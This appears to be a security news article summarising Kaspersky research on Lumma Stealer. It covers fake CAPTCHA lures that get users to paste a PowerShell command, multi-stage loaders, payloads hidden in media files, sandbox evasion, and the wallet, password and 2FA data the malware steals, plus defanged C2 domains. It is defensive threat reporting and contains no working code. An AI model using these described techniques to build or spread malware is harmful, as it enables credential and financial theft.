Lumma Stealer: Unpacking Its Evasive Tactics and Complex Infection Chains

The cybercriminal landscape is constantly evolving, with Malware-as-a-Service (MaaS) lowering the bar for entry and information stealers becoming a lucrative commodity. Among these threats, the Lumma Stealer has emerged as a particularly sophisticated player since its introduction in 2022 by the threat actor known as Lumma.

Initially marketed as LummaC2, this information stealer quickly gained traction in underground forums, with prices starting at $250. Its presence on dark web marketplaces and Telegram channels continues to grow; as of March 2025, it has over a thousand active subscribers. Lumma Stealer is a commercially successful category in the underground economy.

While Lumma Stealer uses many traditional phishing vectors, Kaspersky’s Global Emergency Response Team (GERT) uncovered a particularly deceptive delivery method — fake CAPTCHA pages. These fraudulent pages mimic Google reCAPTCHA or Cloudflare challenges and are often hosted on cloned pirated content or cryptocurrency-related websites.

“Users are prompted to complete an identity verification via a fraudulent ‘Safeguard Captcha’ bot,” which tricks them into executing a malicious command copied to their clipboard.

With a few clicks — typically involving Win+R, Ctrl+V, and Enter — unsuspecting users run a PowerShell command that initiates Lumma’s infection chain. The command downloads an encoded payload from seemingly legitimate CDNs and kicks off the malware deployment process.

What makes Lumma particularly difficult to detect is the complexity of its infection chain. The initial command downloads a .zip file, extracts the malware, and achieves persistence by registering itself under Windows Registry’s Run key.

In more advanced attacks, the malware is hidden inside what appears to be .mp3 or .png files, triggered via the mshta.exe HTML application engine. The JavaScript inside these files builds and executes obfuscated PowerShell scripts which eventually download a massive (~31MB) payload (firefire.png) containing multiple layers of encryption, anti-debugging techniques, and detection evasion mechanisms.

Lumma’s creators are adept at abusing trusted systems. The malware is often injected into:

Overlay sections of legitimate applications
DLLs sideloaded by vulnerable software

In one case, the stealer was bundled with a self-extracting RAR archive posing as a legitimate file named ProjectorNebraska.exe. Upon execution, the payload drops AutoIt fragments, scripts, and a batch loader (Hose.cmd) that reassembles and runs the final stealer payload.

The batch script performs sandbox evasion, disables antivirus monitoring, and crafts the final malicious executable by merging seemingly unrelated files. From there, an obfuscated AutoIt script dynamically injects and executes shellcode in memory to deliver the stealer.

“The script dynamically selects 32-bit or 64-bit shellcode… and executes the second-stage payload, decrypted with RC4 and compressed with LZNT1.”

Once active, Lumma Stealer hunts for sensitive data, including:

Cryptocurrency wallet credentials (e.g., MetaMask, Binance)
2FA codes from authenticator extensions
Browser-stored passwords and cookies
Credentials from AnyDesk, KeePass, and other remote tools
Financial data like credit card information

The stolen information is then transmitted via encrypted HTTP/HTTPS POST requests to attacker-controlled C2 domains like reinforcenh[.]shop, drawzhotdog[.]shop, and several others identified in the investigation.

“Although individuals are the primary targets of these attacks, we saw Lumma in an incident at one of our customers,” Kaspersky reported, underscoring the growing threat to businesses.

The implications are vast. What begins as a simple case of credential theft may escalate into full-scale breaches or be monetized through ransomware groups — a common progression in the cybercrime lifecycle.

Rate this post

Related Posts:

Leave a Reply Cancel reply